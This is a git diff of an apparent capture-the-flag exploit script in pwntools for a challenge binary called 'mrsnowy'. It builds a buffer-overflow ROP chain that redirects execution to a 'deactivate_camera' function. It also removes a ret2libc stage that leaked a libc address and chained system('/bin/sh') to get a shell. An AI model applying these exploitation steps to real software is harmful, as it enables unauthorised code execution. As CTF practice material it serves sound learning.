add exploit script

pwn/mrsnowy/kabuttmache.py

@@ -17,7 +17,7 @@ def do_read():
 
 rop = ROP(elf)
 rop.call(elf.symbols['puts'], [elf.got['puts']])
-rop.call(elf.symbols['investigate'])
+rop.call(elf.symbols['deactivate_camera'])
 
 # assemble payload
 payload = [
@@ -32,28 +32,5 @@ do_read()
 
 # send payload
 p.sendline(b''.join(payload))
-puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
-log.info(f'puts found at {hex(puts)}')
 
-# Note:
-# libc database search for puts address: 0x6d31333b315b1b20
-# -> libc6_2.19-18+deb8u10_i386
-# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
-
-libc = ELF("libc6_2.19-18+deb8u10_i386.so")
-libc.address = puts - libc.symbols["puts"]
-log.info(f'libc base address determined {hex(libc.address)}')
-
-rop = ROP(libc)
-rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('exit')
-
-# assemble payload
-payload = [
-    b'\xAA'*offset,
-	rop.chain()
-]
-
-p.sendline(b''.join(payload))
 p.interactive()